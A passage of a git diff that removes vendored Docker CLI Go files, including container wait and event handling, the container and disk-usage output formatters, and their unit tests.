eventProcessor := func(e events.Message) bool { - stopProcessing := false - switch e.Status { - case "die": - if v, ok := e.Actor.Attributes["exitCode"]; ok { - code, cerr := strconv.Atoi(v) - if cerr != nil { - logrus.Errorf("failed to convert exitcode '%q' to int: %v", v, cerr) - } else { - exitCode = code - } - } - if !waitRemove { - stopProcessing = true - } else { - // If we are talking to an older daemon, `AutoRemove` is not supported. - // We need to fall back to the old behavior, which is client-side removal - if versions.LessThan(dockerCli.Client().ClientVersion(), "1.25") { - go func() { - removeErr = dockerCli.Client().ContainerRemove(ctx, containerID, types.ContainerRemoveOptions{RemoveVolumes: true}) - if removeErr != nil { - logrus.Errorf("error removing container: %v", removeErr) - cancel() // cancel the event Q - } - }() - } - } - case "detach": - exitCode = 0 - stopProcessing = true - case "destroy": - stopProcessing = true - } - return stopProcessing - } - - go func() { - defer func() { - statusChan <- exitCode // must always send an exit code or the caller will block - cancel() - }() - - for { - select { - case <-eventCtx.Done(): - if removeErr != nil { - return - } - case evt := <-eventq: - if eventProcessor(evt) { - return - } - case err := <-errq: - logrus.Errorf("error getting events from daemon: %v", err) - return - } - } - }() - - return statusChan -} - -// getExitCode performs an inspect on the container. It returns -// the running state and the exit code. -func getExitCode(ctx context.Context, dockerCli *command.DockerCli, containerID string) (bool, int, error) { - c, err := dockerCli.Client().ContainerInspect(ctx, containerID) - if err != nil { - // If we can't connect, then the daemon probably died. - if !clientapi.IsErrConnectionFailed(err) { - return false, -1, err - } - return false, -1, nil - } - return c.State.Running, c.State.ExitCode, nil -} - -func parallelOperation(ctx context.Context, containers []string, op func(ctx context.Context, container string) error) chan error { - if len(containers) == 0 { - return nil - } - const defaultParallel int = 50 - sem := make(chan struct{}, defaultParallel) - errChan := make(chan error) - - // make sure result is printed in correct order - output := map[string]chan error{} - for _, c := range containers { - output[c] = make(chan error, 1) - } - go func() { - for _, c := range containers { - err := <-output[c] - errChan <- err - } - }() - - go func() { - for _, c := range containers { - sem <- struct{}{} // Wait for active queue sem to drain. - go func(container string) { - output[container] <- op(ctx, container) - <-sem - }(c) - } - }() - return errChan -} diff --git a/vendor/github.com/docker/docker/cli/command/container/wait.go b/vendor/github.com/docker/docker/cli/command/container/wait.go deleted file mode 100644 index 19ccf7ac25..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/wait.go +++ /dev/null @@ -1,50 +0,0 @@ -package container - -import ( - "fmt" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type waitOptions struct { - containers []string -} - -// NewWaitCommand creates a new cobra.Command for `docker wait` -func NewWaitCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts waitOptions - - cmd := &cobra.Command{ - Use: "wait CONTAINER [CONTAINER...]", - Short: "Block until one or more containers stop, then print their exit codes", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.containers = args - return runWait(dockerCli, &opts) - }, - } - return cmd -} - -func runWait(dockerCli *command.DockerCli, opts *waitOptions) error { - ctx := context.Background() - - var errs []string - for _, container := range opts.containers { - status, err := dockerCli.Client().ContainerWait(ctx, container) - if err != nil { - errs = append(errs, err.Error()) - } else { - fmt.Fprintf(dockerCli.Out(), "%d\n", status) - } - } - if len(errs) > 0 { - return fmt.Errorf("%s", strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/events_utils.go b/vendor/github.com/docker/docker/cli/command/events_utils.go deleted file mode 100644 index e710c97576..0000000000 --- a/vendor/github.com/docker/docker/cli/command/events_utils.go +++ /dev/null @@ -1,49 +0,0 @@ -package command - -import ( - "sync" - - "github.com/Sirupsen/logrus" - eventtypes "github.com/docker/docker/api/types/events" -) - -type eventProcessor func(eventtypes.Message, error) error - -// EventHandler is abstract interface for user to customize -// own handle functions of each type of events -type EventHandler interface { - Handle(action string, h func(eventtypes.Message)) - Watch(c <-chan eventtypes.Message) -} - -// InitEventHandler initializes and returns an EventHandler -func InitEventHandler() EventHandler { - return &eventHandler{handlers: make(map[string]func(eventtypes.Message))} -} - -type eventHandler struct { - handlers map[string]func(eventtypes.Message) - mu sync.Mutex -} - -func (w *eventHandler) Handle(action string, h func(eventtypes.Message)) { - w.mu.Lock() - w.handlers[action] = h - w.mu.Unlock() -} - -// Watch ranges over the passed in event chan and processes the events based on the -// handlers created for a given action. -// To stop watching, close the event chan. -func (w *eventHandler) Watch(c <-chan eventtypes.Message) { - for e := range c { - w.mu.Lock() - h, exists := w.handlers[e.Action] - w.mu.Unlock() - if !exists { - continue - } - logrus.Debugf("event handler: received event: %v", e) - go h(e) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container.go b/vendor/github.com/docker/docker/cli/command/formatter/container.go deleted file mode 100644 index 6273453355..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/container.go +++ /dev/null @@ -1,235 +0,0 @@ -package formatter - -import ( - "fmt" - "strconv" - "strings" - "time" - - "github.com/docker/docker/api" - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/stringutils" - units "github.com/docker/go-units" -) - -const ( - defaultContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Ports}}\t{{.Names}}" - - containerIDHeader = "CONTAINER ID" - namesHeader = "NAMES" - commandHeader = "COMMAND" - runningForHeader = "CREATED" - statusHeader = "STATUS" - portsHeader = "PORTS" - mountsHeader = "MOUNTS" - localVolumes = "LOCAL VOLUMES" - networksHeader = "NETWORKS" -) - -// NewContainerFormat returns a Format for rendering using a Context -func NewContainerFormat(source string, quiet bool, size bool) Format { - switch source { - case TableFormatKey: - if quiet { - return defaultQuietFormat - } - format := defaultContainerTableFormat - if size { - format += `\t{{.Size}}` - } - return Format(format) - case RawFormatKey: - if quiet { - return `container_id: {{.ID}}` - } - format := `container_id: {{.ID}} -image: {{.Image}} -command: {{.Command}} -created_at: {{.CreatedAt}} -status: {{- pad .Status 1 0}} -names: {{.Names}} -labels: {{- pad .Labels 1 0}} -ports: {{- pad .Ports 1 0}} -` - if size { - format += `size: {{.Size}}\n` - } - return Format(format) - } - return Format(source) -} - -// ContainerWrite renders the context for a list of containers -func ContainerWrite(ctx Context, containers []types.Container) error { - render := func(format func(subContext subContext) error) error { - for _, container := range containers { - err := format(&containerContext{trunc: ctx.Trunc, c: container}) - if err != nil { - return err - } - } - return nil - } - return ctx.Write(&containerContext{}, render) -} - -type containerContext struct { - HeaderContext - trunc bool - c types.Container -} - -func (c *containerContext) MarshalJSON() ([]byte, error) { - return marshalJSON(c) -} - -func (c *containerContext) ID() string { - c.AddHeader(containerIDHeader) - if c.trunc { - return stringid.TruncateID(c.c.ID) - } - return c.c.ID -} - -func (c *containerContext) Names() string { - c.AddHeader(namesHeader) - names := stripNamePrefix(c.c.Names) - if c.trunc { - for _, name := range names { - if len(strings.Split(name, "/")) == 1 { - names = []string{name} - break - } - } - } - return strings.Join(names, ",") -} - -func (c *containerContext) Image() string { - c.AddHeader(imageHeader) - if c.c.Image == "" { - return "" - } - if c.trunc { - if trunc := stringid.TruncateID(c.c.ImageID); trunc == stringid.TruncateID(c.c.Image) { - return trunc - } - } - return c.c.Image -} - -func (c *containerContext) Command() string { - c.AddHeader(commandHeader) - command := c.c.Command - if c.trunc { - command = stringutils.Ellipsis(command, 20) - } - return strconv.Quote(command) -} - -func (c *containerContext) CreatedAt() string { - c.AddHeader(createdAtHeader) - return time.Unix(int64(c.c.Created), 0).String() -} - -func (c *containerContext) RunningFor() string { - c.AddHeader(runningForHeader) - createdAt := time.Unix(int64(c.c.Created), 0) - return units.HumanDuration(time.Now().UTC().Sub(createdAt)) -} - -func (c *containerContext) Ports() string { - c.AddHeader(portsHeader) - return api.DisplayablePorts(c.c.Ports) -} - -func (c *containerContext) Status() string { - c.AddHeader(statusHeader) - return c.c.Status -} - -func (c *containerContext) Size() string { - c.AddHeader(sizeHeader) - srw := units.HumanSizeWithPrecision(float64(c.c.SizeRw), 3) - sv := units.HumanSizeWithPrecision(float64(c.c.SizeRootFs), 3) - - sf := srw - if c.c.SizeRootFs > 0 { - sf = fmt.Sprintf("%s (virtual %s)", srw, sv) - } - return sf -} - -func (c *containerContext) Labels() string { - c.AddHeader(labelsHeader) - if c.c.Labels == nil { - return "" - } - - var joinLabels []string - for k, v := range c.c.Labels { - joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) - } - return strings.Join(joinLabels, ",") -} - -func (c *containerContext) Label(name string) string { - n := strings.Split(name, ".") - r := strings.NewReplacer("-", " ", "_", " ") - h := r.Replace(n[len(n)-1]) - - c.AddHeader(h) - - if c.c.Labels == nil { - return "" - } - return c.c.Labels[name] -} - -func (c *containerContext) Mounts() string { - c.AddHeader(mountsHeader) - - var name string - var mounts []string - for _, m := range c.c.Mounts { - if m.Name == "" { - name = m.Source - } else { - name = m.Name - } - if c.trunc { - name = stringutils.Ellipsis(name, 15) - } - mounts = append(mounts, name) - } - return strings.Join(mounts, ",") -} - -func (c *containerContext) LocalVolumes() string { - c.AddHeader(localVolumes) - - count := 0 - for _, m := range c.c.Mounts { - if m.Driver == "local" { - count++ - } - } - - return fmt.Sprintf("%d", count) -} - -func (c *containerContext) Networks() string { - c.AddHeader(networksHeader) - - if c.c.NetworkSettings == nil { - return "" - } - - networks := []string{} - for k := range c.c.NetworkSettings.Networks { - networks = append(networks, k) - } - - return strings.Join(networks, ",") -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go deleted file mode 100644 index 16137897b9..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go +++ /dev/null @@ -1,398 +0,0 @@ -package formatter - -import ( - "bytes" - "encoding/json" - "fmt" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestContainerPsContext(t *testing.T) { - containerID := stringid.GenerateRandomID() - unix := time.Now().Add(-65 * time.Second).Unix() - - var ctx containerContext - cases := []struct { - container types.Container - trunc bool - expValue string - expHeader string - call func() string - }{ - {types.Container{ID: containerID}, true, stringid.TruncateID(containerID), containerIDHeader, ctx.ID}, - {types.Container{ID: containerID}, false, containerID, containerIDHeader, ctx.ID}, - {types.Container{Names: []string{"/foobar_baz"}}, true, "foobar_baz", namesHeader, ctx.Names}, - {types.Container{Image: "ubuntu"}, true, "ubuntu", imageHeader, ctx.Image}, - {types.Container{Image: "verylongimagename"}, true, "verylongimagename", imageHeader, ctx.Image}, - {types.Container{Image: "verylongimagename"}, false, "verylongimagename", imageHeader, ctx.Image}, - {types.Container{ - Image: "a5a665ff33eced1e0803148700880edab4", - ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", - }, - true, - "a5a665ff33ec", - imageHeader, - ctx.Image, - }, - {types.Container{ - Image: "a5a665ff33eced1e0803148700880edab4", - ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", - }, - false, - "a5a665ff33eced1e0803148700880edab4", - imageHeader, - ctx.Image, - }, - {types.Container{Image: ""}, true, "", imageHeader, ctx.Image}, - {types.Container{Command: "sh -c 'ls -la'"}, true, `"sh -c 'ls -la'"`, commandHeader, ctx.Command}, - {types.Container{Created: unix}, true, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, - {types.Container{Ports: []types.Port{{PrivatePort: 8080, PublicPort: 8080, Type: "tcp"}}}, true, "8080/tcp", portsHeader, ctx.Ports}, - {types.Container{Status: "RUNNING"}, true, "RUNNING", statusHeader, ctx.Status}, - {types.Container{SizeRw: 10}, true, "10 B", sizeHeader, ctx.Size}, - {types.Container{SizeRw: 10, SizeRootFs: 20}, true, "10 B (virtual 20 B)", sizeHeader, ctx.Size}, - {types.Container{}, true, "", labelsHeader, ctx.Labels}, - {types.Container{Labels: map[string]string{"cpu": "6", "storage": "ssd"}}, true, "cpu=6,storage=ssd", labelsHeader, ctx.Labels}, - {types.Container{Created: unix}, true, "About a minute", runningForHeader, ctx.RunningFor}, - {types.Container{ - Mounts: []types.MountPoint{ - { - Name: "this-is-a-long-volume-name-and-will-be-truncated-if-trunc-is-set", - Driver: "local", - Source: "/a/path", - }, - }, - }, true, "this-is-a-lo...", mountsHeader, ctx.Mounts}, - {types.Container{ - Mounts: []types.MountPoint{ - { - Driver: "local", - Source: "/a/path", - }, - }, - }, false, "/a/path", mountsHeader, ctx.Mounts}, - {types.Container{ - Mounts: []types.MountPoint{ - { - Name: "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", - Driver: "local", - Source: "/a/path", - }, - }, - }, false, "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", mountsHeader, ctx.Mounts}, - } - - for _, c := range cases { - ctx = containerContext{c: c.container, trunc: c.trunc} - v := c.call() - if strings.Contains(v, ",") { - compareMultipleValues(t, v, c.expValue) - } else if v != c.expValue { - t.Fatalf("Expected %s, was %s\n", c.expValue, v) - } - - h := ctx.FullHeader() - if h != c.expHeader { - t.Fatalf("Expected %s, was %s\n", c.expHeader, h) - } - } - - c1 := types.Container{Labels: map[string]string{"com.docker.swarm.swarm-id": "33", "com.docker.swarm.node_name": "ubuntu"}} - ctx = containerContext{c: c1, trunc: true} - - sid := ctx.Label("com.docker.swarm.swarm-id") - node := ctx.Label("com.docker.swarm.node_name") - if sid != "33" { - t.Fatalf("Expected 33, was %s\n", sid) - } - - if node != "ubuntu" { - t.Fatalf("Expected ubuntu, was %s\n", node) - } - - h := ctx.FullHeader() - if h != "SWARM ID\tNODE NAME" { - t.Fatalf("Expected %s, was %s\n", "SWARM ID\tNODE NAME", h) - - } - - c2 := types.Container{} - ctx = containerContext{c: c2, trunc: true} - - label := ctx.Label("anything.really") - if label != "" { - t.Fatalf("Expected an empty string, was %s", label) - } - - ctx = containerContext{c: c2, trunc: true} - FullHeader := ctx.FullHeader() - if FullHeader != "" { - t.Fatalf("Expected FullHeader to be empty, was %s", FullHeader) - } - -} - -func TestContainerContextWrite(t *testing.T) { - unixTime := time.Now().AddDate(0, 0, -1).Unix() - expectedTime := time.Unix(unixTime, 0).String() - - cases := []struct { - context Context - expected string - }{ - // Errors - { - Context{Format: "{{InvalidFunction}}"}, - `Template parsing error: template: :1: function "InvalidFunction" not defined -`, - }, - { - Context{Format: "{{nil}}"}, - `Template parsing error: template: :1:2: executing "" at : nil is not a command -`, - }, - // Table Format - { - Context{Format: NewContainerFormat("table", false, true)}, - `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES SIZE -containerID1 ubuntu "" 24 hours ago foobar_baz 0 B -containerID2 ubuntu "" 24 hours ago foobar_bar 0 B -`, - }, - { - Context{Format: NewContainerFormat("table", false, false)}, - `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES -containerID1 ubuntu "" 24 hours ago foobar_baz -containerID2 ubuntu "" 24 hours ago foobar_bar -`, - }, - { - Context{Format: NewContainerFormat("table {{.Image}}", false, false)}, - "IMAGE\nubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("table {{.Image}}", false, true)}, - "IMAGE\nubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("table {{.Image}}", true, false)}, - "IMAGE\nubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("table", true, false)}, - "containerID1\ncontainerID2\n", - }, - // Raw Format - { - Context{Format: NewContainerFormat("raw", false, false)}, - fmt.Sprintf(`container_id: containerID1 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_baz -labels: -ports: - -container_id: containerID2 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_bar -labels: -ports: - -`, expectedTime, expectedTime), - }, - { - Context{Format: NewContainerFormat("raw", false, true)}, - fmt.Sprintf(`container_id: containerID1 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_baz -labels: -ports: -size: 0 B - -container_id: containerID2 -image: ubuntu -command: "" -created_at: %s -status: -names: foobar_bar -labels: -ports: -size: 0 B - -`, expectedTime, expectedTime), - }, - { - Context{Format: NewContainerFormat("raw", true, false)}, - "container_id: containerID1\ncontainer_id: containerID2\n", - }, - // Custom Format - { - Context{Format: "{{.Image}}"}, - "ubuntu\nubuntu\n", - }, - { - Context{Format: NewContainerFormat("{{.Image}}", false, true)}, - "ubuntu\nubuntu\n", - }, - } - - for _, testcase := range cases { - containers := []types.Container{ - {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unixTime}, - {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unixTime}, - } - out := bytes.NewBufferString("") - testcase.context.Output = out - err := ContainerWrite(testcase.context, containers) - if err != nil { - assert.Error(t, err, testcase.expected) - } else { - assert.Equal(t, out.String(), testcase.expected) - } - } -} - -func TestContainerContextWriteWithNoContainers(t *testing.T) { - out := bytes.NewBufferString("") - containers := []types.Container{} - - contexts := []struct { - context Context - expected string - }{ - { - Context{ - Format: "{{.Image}}", - Output: out, - }, - "", - }, - { - Context{ - Format: "table {{.Image}}", - Output: out, - }, - "IMAGE\n", - }, - { - Context{ - Format: NewContainerFormat("{{.Image}}", false, true), - Output: out, - }, - "", - }, - { - Context{ - Format: NewContainerFormat("table {{.Image}}", false, true), - Output: out, - }, - "IMAGE\n", - }, - { - Context{ - Format: "table {{.Image}}\t{{.Size}}", - Output: out, - }, - "IMAGE SIZE\n", - }, - { - Context{ - Format: NewContainerFormat("table {{.Image}}\t{{.Size}}", false, true), - Output: out, - }, - "IMAGE SIZE\n", - }, - } - - for _, context := range contexts { - ContainerWrite(context.context, containers) - assert.Equal(t, context.expected, out.String()) - // Clean buffer - out.Reset() - } -} - -func TestContainerContextWriteJSON(t *testing.T) { - unix := time.Now().Add(-65 * time.Second).Unix() - containers := []types.Container{ - {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu", Created: unix}, - {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu", Created: unix}, - } - expectedCreated := time.Unix(unix, 0).String() - expectedJSONs := []map[string]interface{}{ - {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID1", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_baz", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, - {"Command": "\"\"", "CreatedAt": expectedCreated, "ID": "containerID2", "Image": "ubuntu", "Labels": "", "LocalVolumes": "0", "Mounts": "", "Names": "foobar_bar", "Networks": "", "Ports": "", "RunningFor": "About a minute", "Size": "0 B", "Status": ""}, - } - out := bytes.NewBufferString("") - err := ContainerWrite(Context{Format: "{{json .}}", Output: out}, containers) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var m map[string]interface{} - if err := json.Unmarshal([]byte(line), &m); err != nil { - t.Fatal(err) - } - assert.DeepEqual(t, m, expectedJSONs[i]) - } -} - -func TestContainerContextWriteJSONField(t *testing.T) { - containers := []types.Container{ - {ID: "containerID1", Names: []string{"/foobar_baz"}, Image: "ubuntu"}, - {ID: "containerID2", Names: []string{"/foobar_bar"}, Image: "ubuntu"}, - } - out := bytes.NewBufferString("") - err := ContainerWrite(Context{Format: "{{json .ID}}", Output: out}, containers) - if err != nil { - t.Fatal(err) - } - for i, line := range strings.Split(strings.TrimSpace(out.String()), "\n") { - t.Logf("Output: line %d: %s", i, line) - var s string - if err := json.Unmarshal([]byte(line), &s); err != nil { - t.Fatal(err) - } - assert.Equal(t, s, containers[i].ID) - } -} - -func TestContainerBackCompat(t *testing.T) { - containers := []types.Container{{ID: "brewhaha"}} - cases := []string{ - "ID", - "Names", - "Image", - "Command", - "CreatedAt", - "RunningFor", - "Ports", - "Status", - "Size", - "Labels", - "Mounts", - } - buf := bytes.NewBuffer(nil) - for _, c := range cases { - ctx := Context{Format: Format(fmt.Sprintf("{{ .%s }}", c)), Output: buf} - if err := ContainerWrite(ctx, containers); err != nil { - t.Logf("could not render template for field '%s': %v", c, err) - t.Fail() - } - buf.Reset() - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom.go b/vendor/github.com/docker/docker/cli/command/formatter/custom.go deleted file mode 100644 index df32684429..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/custom.go +++ /dev/null @@ -1,51 +0,0 @@ -package formatter - -import ( - "strings" -) - -const ( - imageHeader = "IMAGE" - createdSinceHeader = "CREATED" - createdAtHeader = "CREATED AT" - sizeHeader = "SIZE" - labelsHeader = "LABELS" - nameHeader = "NAME" - driverHeader = "DRIVER" - scopeHeader = "SCOPE" -) - -type subContext interface { - FullHeader() string - AddHeader(header string) -} - -// HeaderContext provides the subContext interface for managing headers -type HeaderContext struct { - header []string -} - -// FullHeader returns the header as a string -func (c *HeaderContext) FullHeader() string { - if c.header == nil { - return "" - } - return strings.Join(c.header, "\t") -} - -// AddHeader adds another column to the header -func (c *HeaderContext) AddHeader(header string) { - if c.header == nil { - c.header = []string{} - } - c.header = append(c.header, strings.ToUpper(header)) -} - -func stripNamePrefix(ss []string) []string { - sss := make([]string, len(ss)) - for i, s := range ss { - sss[i] = s[1:] - } - - return sss -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go b/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go deleted file mode 100644 index da42039dca..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/custom_test.go +++ /dev/null @@ -1,28 +0,0 @@ -package formatter - -import ( - "reflect" - "strings" - "testing" -) - -func compareMultipleValues(t *testing.T, value, expected string) { - // comma-separated values means probably a map input, which won't - // be guaranteed to have the same order as our expected value - // We'll create maps and use reflect.DeepEquals to check instead: - entriesMap := make(map[string]string) - expMap := make(map[string]string) - entries := strings.Split(value, ",") - expectedEntries := strings.Split(expected, ",") - for _, entry := range entries { - keyval := strings.Split(entry, "=") - entriesMap[keyval[0]] = keyval[1] - } - for _, expected := range expectedEntries { - keyval := strings.Split(expected, "=") - expMap[keyval[0]] = keyval[1] - } - if !reflect.DeepEqual(expMap, entriesMap) { - t.Fatalf("Expected entries: %v, got: %v", expected, value) - } -} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go b/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go deleted file mode 100644 index 5309d880a5..0000000000 --- a/vendor/github.com/docker/docker/cli/command/formatter/disk_usage.go +++ /dev/null @@ -1,334 +0,0 @@ -package formatter - -import ( - "bytes" - "fmt" - "strings" - "text/template" - - "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types" - units "github.com/docker/go-units" -) - -const ( - defaultDiskUsageImageTableFormat = "table {{.Repository}}\t{{.Tag}}\t{{.ID}}\t{{.CreatedSince}} ago\t{{.VirtualSize}}\t{{.SharedSize}}\t{{.UniqueSize}}\t{{.Containers}}" - defaultDiskUsageContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.LocalVolumes}}\t{{.Size}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Names}}" - defaultDiskUsageVolumeTableFormat = "table {{.Name}}\t{{.Links}}\t{{.Size}}" - defaultDiskUsageTableFormat = "table {{.Type}}\t{{.TotalCount}}\t{{.Active}}\t{{.Size}}\t{{.Reclaimable}}" - - typeHeader = "TYPE" - totalHeader = "TOTAL" - activeHeader = "ACTIVE" - reclaimableHeader = "RECLAIMABLE" - containersHeader = "CONTAINERS" - sharedSizeHeader = "SHARED SIZE" - uniqueSizeHeader = "UNIQUE SiZE" -) - -// DiskUsageContext contains disk usage specific information required by the formater, encapsulate a Context struct. -type DiskUsageContext struct { - Context - Verbose bool - LayersSize int64 - Images []*types.ImageSummary - Containers []*types.Container - Volumes []*types.Volume -} - -func (ctx *DiskUsageContext) startSubsection(format string) (*template.Template, error) { - ctx.buffer = bytes.NewBufferString("") - ctx.header = "" - ctx.Format = Format(format) - ctx.preFormat() - - return ctx.parseFormat() -} - -func (ctx *DiskUsageContext) Write() { - if ctx.Verbose == false { - ctx.buffer = bytes.NewBufferString("") - ctx.Format = defaultDiskUsageTableFormat - ctx.preFormat() - - tmpl, err := ctx.parseFormat() - if err != nil { - return - } - - err = ctx.contextFormat(tmpl, &diskUsageImagesContext{ - totalSize: ctx.LayersSize, - images: ctx.Images, - }) - if err != nil { - return - } - err = ctx.contextFormat(tmpl, &diskUsageContainersContext{ - containers: ctx.Containers, - }) - if err != nil { - return - } - - err = ctx.contextFormat(tmpl, &diskUsageVolumesContext{ - volumes: ctx.Volumes, - }) - if err != nil { - return - } - - ctx.postFormat(tmpl, &diskUsageContainersContext{containers: []*types.Container{}}) - - return - } - - // First images - tmpl, err := ctx.startSubsection(defaultDiskUsageImageTableFormat) - if err != nil { - return - } - - ctx.Output.Write([]byte("Images space usage:\n\n")) - for _, i := range ctx.Images { - repo := "" - tag := "" - if len(i.RepoTags) > 0 && !isDangling(*i) { - // Only show the first tag - ref, err := reference.ParseNamed(i.RepoTags[0]) - if err != nil { - continue - } - if nt, ok := ref.(reference.NamedTagged); ok { - repo = ref.Name() - tag = nt.Tag() - } - } - - err = ctx.contextFormat(tmpl, &imageContext{ - repo: repo, - tag: tag, - trunc: true, - i: *i, - }) - if err != nil { - return - } - } - ctx.postFormat(tmpl, &imageContext{}) - - // Now containers - ctx.Output.Write([]byte("\nContainers space usage:\n\n")) - tmpl, err = ctx.startSubsection(defaultDiskUsageContainerTableFormat) - if err != nil { - return - } - for _, c := range ctx.Containers { - // Don't display the virtual size - c.SizeRootFs = 0 - err = ctx.contextFormat(tmpl, &containerContext{ - trunc: true, - c: *c, - }) - if err != nil { - return - } - } - ctx.postFormat(tmpl, &containerContext{}) - - // And volumes - ctx.Output.Write([]byte("\nLocal Volumes space usage:\n\n")) - tmpl, err = ctx.startSubsection(defaultDiskUsageVolumeTableFormat) - if err != nil { - return - } - for _, v := range ctx.Volumes { - err = ctx.contextFormat(tmpl, &volumeContext{ - v: *v, - }) - if err != nil { - return - } - } - ctx.postFormat(tmpl, &volumeContext{v: types.Volume{}}) -} - -type diskUsageImagesContext struct { - HeaderContext - totalSize int64 - images []*types.ImageSummary -} - -func (c *diskUsageImagesContext) Type() string { - c.AddHeader(typeHeader) - return "Images" -} - -func (c *diskUsageImagesContext) TotalCount() string { - c.AddHeader(totalHeader) - return fmt.Sprintf("%d", len(c.images)) -} - -func (c *diskUsageImagesContext) Active() string { - c.AddHeader(activeHeader) - used := 0 - for _, i := range c.images { - if i.Containers > 0 { - used++ - } - } - - return fmt.Sprintf("%d", used) -} - -func (c *diskUsageImagesContext) Size() string { - c.AddHeader(sizeHeader) - return units.HumanSize(float64(c.totalSize)) - -} - -func (c *diskUsageImagesContext) Reclaimable() string { - var used int64 - - c.AddHeader(reclaimableHeader) - for _, i := range c.images { - if i.Containers != 0 { - if i.VirtualSize == -1 || i.SharedSize == -1 { - continue - } - used += i.VirtualSize - i.SharedSize - } - } - - reclaimable := c.totalSize - used - if c.totalSize > 0 { - return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/c.totalSize) - } - return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) -} - -type diskUsageContainersContext struct { - HeaderContext - verbose bool - containers []*types.Container -} - -func (c *diskUsageContainersContext) Type() string { - c.AddHeader(typeHeader) - return "Containers" -} - -func (c *diskUsageContainersContext) TotalCount() string { - c.AddHeader(totalHeader) - return fmt.Sprintf("%d", len(c.containers)) -} - -func (c *diskUsageContainersContext) isActive(container types.Container) bool { - return strings.Contains(container.State, "running") || - strings.Contains(container.State, "paused") || - strings.Contains(container.State, "restarting") -} - -func (c *diskUsageContainersContext) Active() string { - c.AddHeader(activeHeader) - used := 0 - for _, container := range c.containers { - if c.isActive(*container) { - used++ - } - } - - return fmt.Sprintf("%d", used) -} - -func (c *diskUsageContainersContext) Size() string { - var size int64 - - c.AddHeader(sizeHeader) - for _, container := range c.containers { - size += container.SizeRw - } - - return units.HumanSize(float64(size)) -} - -func (c *diskUsageContainersContext) Reclaimable() string { - var reclaimable int64 - var totalSize int64 - - c.AddHeader(reclaimableHeader) - for _, container := range c.containers { - if !c.isActive(*container) { - reclaimable += container.SizeRw - } - totalSize += container.SizeRw - } - - if totalSize > 0 { - return fmt.Sprintf("%s (%v%%)", units.HumanSize(float64(reclaimable)), (reclaimable*100)/totalSize) - } - - return fmt.Sprintf("%s", units.HumanSize(float64(reclaimable))) -} - -type diskUsageVolumesContext struct { - HeaderContext - verbose bool - volumes []*types.Volume -} - -func (c *diskUsageVolumesContext) Type() string { - c.AddHeader(typeHeader) - return "Local Volumes" -} - -func (c *diskUsageVolumesContext) TotalCount() string { - c.AddHeader(totalHeader) - return fmt.Sprintf("%d", len(c.volumes)) -} - -func (c *diskUsageVolumesContext) Active() string { - c.AddHeader(activeHeader) - - used := 0 - for _, v := range c.volumes { - if v.UsageData.RefCount > 0 { - used++ - } - } - - return fmt.Sprintf("%d", used) -} - -func (c *diskUsageVolumesContext) Size() string { - var size int64 - - c.AddHeader(sizeHeader) - for _, v := range c.volumes { - if v.UsageData.Size != -1 { - size += v.UsageData.Size - } - } - - return units.HumanSize(float64(size)) -} - -func (c *diskUsageVolumesContext) Reclaimable() string { - var reclaimable int64 - var totalSize int64 - - c.AddHeader(reclaimableHeader) - for _, v := range c.volumes { - if v.UsageData.Size != -1 { - if v.UsageData.RefCount == 0 { - reclaimable += v.UsageData.Size - } - totalSize += v.UsageData.Size - } - } - - if totalSize > 0 { - return fmt.Sprintf("%s 